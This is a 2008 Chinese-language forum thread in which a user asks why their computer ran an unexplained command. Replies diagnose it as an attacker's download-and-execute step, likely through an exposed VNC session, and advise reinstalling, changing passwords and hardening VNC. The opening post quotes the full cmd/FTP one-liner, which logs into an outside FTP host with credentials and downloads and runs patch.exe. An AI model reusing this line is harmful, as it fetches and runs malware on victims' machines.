|
||
|
Advance Member
  
加入日期: Jan 2002
文章: 317
|
我被入侵了..請問它打了這些指令是什麼意思??
各位好
我在上網時...電腦突然就自己執行起來 動作如下 工作管理跳出來 執行新工作,指令如下 cmd /c echo open ftp.tetovaret.net 21 >> ik &echo user faraonbaba1 cufa1234 >> ik &echo binary >> ik &echo get patch.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &patch.exe &exit 然後就不見了.... 請問這指令是什麼時候丫 因為我有另一台電腦是專門下載的 當然用VNC連線到下載機時 就會很常這樣 但我二台都有開防火牆 + 還有裝NOD32 是真的被入侵了嗎 那我裝的NOD32和防火牆是不是都沒有用啊.... |
|||||||
2008-12-10, 10:58 PM
#1
|
|
|
Elite Member
加入日期: Jul 2000 您的住址: R.O.C
文章: 5,640
|
http://www.google.com/search?q=cmd%...ovaret.net%2021
http://cyanchat.dnijazzclub.com/own...remote-desktop/ 看起來像是惡作劇遠端遙控程式  |
||
|
2008-12-11, 12:14 AM
#2
|
|
|
Master Member
加入日期: Dec 2001
文章: 1,747
|
建議一些網路密碼之類的趕快換掉.
整台電腦重灌. 不覺得只是惡作劇.... 另外. 這東西網路上討論的很少. 可能沒啥防毒軟體可以偵測?!
__________________
免費免註冊薪資行情查詢 - 人力銀行最討厭的網站... |
|
2008-12-11, 12:16 AM
#3
|
|
|
Junior Member
加入日期: Dec 2001
文章: 728
|
看起來很像是利用遠端在你的電腦建立了一個ik.txt檔,裡面記錄了帳號跟密碼
然後使用ftp指令利用這個檔案登入取得patch.exe後,刪除ik.txt及patch.exe後離開 看起來很像是惡作劇的感覺,不過建議你還是趕快改一下你的本機及網路密碼吧 |
|
2008-12-11, 12:32 AM
#4
|
|
|
Master Member
加入日期: Dec 2001
文章: 1,747
|
還有加上一個 "執行 patch.exe"
不知道會對系統做什麼事情.
__________________
免費免註冊薪資行情查詢 - 人力銀行最討厭的網站... |
|
2008-12-11, 01:04 AM
#5
|
|
|
*停權中*
加入日期: Mar 2007
文章: 17
|
報警比較重要
................ |
|
2008-12-11, 01:51 AM
#6
|
|
|
Major Member
 加入日期: Oct 2005
文章: 114
|
直接去大本營問問看就知道了
那邊的高手有兩種,一種是是收錢防駭客的職業專家(道) 另外一種是不收錢搞破壞的業娛駭客(魔) 資安論壇: http://forum.icst.org.tw/phpbb/ 講話要客氣點、問題要深入點 不要白目到讓自己變成了實驗的對像 運氣好的話說不定還可以看到黑、白兩道對嗆的討論  上一次是白的輸掉(論壇被攻陷),但黑的也被請到警察局打工
__________________
本人講話都是屁話,無需針對內容做回應 |
|
2008-12-11, 03:21 AM
#7
|
|
|
Advance Member
加入日期: Jan 2002
文章: 317
|
去資安論壇問了大家的意見
還是重灌加上修改密碼為上策了 感謝大家的幫忙 |
|
2008-12-14, 05:34 PM
#8
|
|
|
Regular Member
 
加入日期: Jan 2006 您的住址: 警視廳
文章: 55
|
有出現這個畫面嗎
 |
|
2008-12-15, 01:50 AM
#9
|
|
|
*停權中*
加入日期: Mar 2002
文章: 733
|
一般來說,這通常是User電腦有裝VNC才會發生的狀況,
如果VNC密碼設得太簡單,又一時疏忽對外開放連線Port,就容易被入侵, 一旦駭客連線VNC成功,就會迅速下載木馬或病毒程式並執行它,就中獎了~ 因為VNC是User自己開放的合法連線,因此防火牆跟防毒軟體都不會有作用。 所以VNC密碼請設複雜一點,最好常常更換,如無需要請關閉對外的連線Port, 僅允許區網內使用。最好也改掉預設的Port號(預設通常是5900),這樣會安全些。 |
|
2008-12-15, 03:43 AM
#10
|
|
